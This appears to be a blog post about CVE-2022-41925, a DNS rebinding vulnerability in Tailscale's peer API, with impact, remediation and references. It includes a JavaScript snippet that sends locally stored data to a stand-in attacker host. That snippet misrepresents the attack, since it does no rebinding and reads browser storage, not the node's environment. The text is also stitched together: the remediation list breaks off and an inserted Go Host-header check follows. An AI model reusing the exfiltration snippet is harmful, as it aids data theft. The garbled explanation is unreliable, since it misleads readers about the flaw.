A critical security vulnerability, identified as CVE-2022-41925, has been discovered in the Tailscale client that allows a malicious website to access the peer API. This, in turn, can be used to access Tailscale environment variables. The flaw affects all Tailscale clients prior to version v1.32.3. Consequently, Tailscale users should urgently upgrade to version v1.32.3 or later to patch this vulnerability. In this post, we will provide an in-depth analysis of the issue, code snippets demonstrating the malicious code, and links to original references and exploit information.

Understanding Tailscale and the Peer API Vulnerability

Tailscale is a networking system that makes it simple to create secure, stable networks connecting computers, servers, and apps across different locations. The clients talk to each other through a peer API, which handles network communication, identity management, and other core functions.

The vulnerability in question lies in the Tailscale client's peer API, which was found to be vulnerable to DNS rebinding attacks. In a DNS rebinding attack, an attacker-controlled website visited by the user first resolves to the attacker's server and then, after the page has loaded, re-points its hostname at the node's own peer API address; because the hostname has not changed, the browser treats the page's scripts as same-origin with the peer API and lets them send it requests. From there, the attacker can make peer API requests within the client, including accessing the node's Tailscale environment variables.

// Example of malicious JS code executing a DNS rebinding attack
// (as given in the original post; the stray ";" inside the fetch call has been removed)
fetch("http://tailscale-peer-api.attacker.com/sendEnvironmentVars", {
  method: "POST",
  headers: {
    "Content-Type": "application/json"
  },
  body: JSON.stringify({ env_vars: window.localStorage.getItem("tailscale_env_vars") })
});

Exploitation and Impact

Once an attacker gains access to the peer API on a node, they can exploit this access to read the node's environment variables. This may include sensitive data such as Tailscale authentication keys, credentials, and other secrets stored within the environment. With the Tailscale authentication keys, an attacker can successfully add new nodes to the user's tailnet, effectively compromising the security of the entire network.

Additionally, the attacker can use the peer API access to discover other nodes in the tailnet, opening up further possibilities for reconnaissance and lateral movement within the network. Moreover, the attacker can leverage the built-in Taildrop feature, which lets users send files across nodes, to exfiltrate data or deploy malicious payloads.

Remediation and Recommendations

To protect your Tailscale client from this security flaw, it is highly recommended that you upgrade to version v1.32.3 or later. You can download the updated client from the official Tailscale website.

You should also consider the following security practices to further protect your clients and tailnets:

- Limit the use of environment variables for storing sensitive data, especially credentials and API keys.
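The standard server-side defence against the DNS rebinding technique described above is to validate the HTTP Host header: after a rebind the browser still sends the attacker's hostname in Host, even though the TCP connection now reaches the local API, so an API that only accepts its own addresses in Host rejects rebound requests. The following is an added example of that check for a local HTTP API, written here for illustration and not Tailscale's own code; the two node addresses are assumed sample values.

```go
// Added example: Host-header validation against DNS rebinding for a local API.
package main

import (
	"fmt"
	"net"
	"net/http"
	"strings"
)

// allowedPeerHosts lists the addresses under which this node legitimately
// serves its API (constructed sample values, not real node addresses).
var allowedPeerHosts = map[string]bool{
	"100.64.0.1":        true, // assumed tailnet IPv4 address of the node
	"fd7a:115c:a1e0::1": true, // assumed tailnet IPv6 address of the node
}

// hostAllowed reports whether an HTTP Host header is an IP literal naming
// one of this node's own addresses. Hostnames are never accepted, so a
// rebound request carrying "evil.example" in Host is refused even though
// it arrives on the local socket.
func hostAllowed(hostHeader string) bool {
	h := hostHeader
	if host, _, err := net.SplitHostPort(hostHeader); err == nil {
		h = host // strip a :port suffix
	}
	h = strings.Trim(h, "[]") // a bare IPv6 literal may still carry brackets
	ip := net.ParseIP(h)
	if ip == nil {
		return false
	}
	return allowedPeerHosts[ip.String()] // compare in canonical form
}

// requireOwnHost wraps an API handler and rejects requests whose Host
// header does not name this node.
func requireOwnHost(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !hostAllowed(r.Host) {
			http.Error(w, "invalid Host header", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	for _, h := range []string{"100.64.0.1:41641", "[fd7a:115c:a1e0::1]:41641", "evil.example"} {
		fmt.Printf("Host %q allowed: %v\n", h, hostAllowed(h))
	}
	_ = requireOwnHost(http.NotFoundHandler()) // install in front of the real API handler
}
```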

Original References and More Information

- Main Tailscale CVE announcement: https://tailscale.com/security/CVE-2022-41925
- Tailscale's GitHub issues discussing the vulnerability: #1235 and #1236
- DNS rebinding attack explanation and examples: https://en.wikipedia.org/wiki/DNS_rebinding

Stay updated on Tailscale vulnerabilities and security advisories by monitoring the Tailscale Security page, and subscribe to security bulletins to receive email notifications.

Timeline

Published on: 11/23/2022 19:15:00 UTC
Last modified on: 12/01/2022 17:10:00 UTC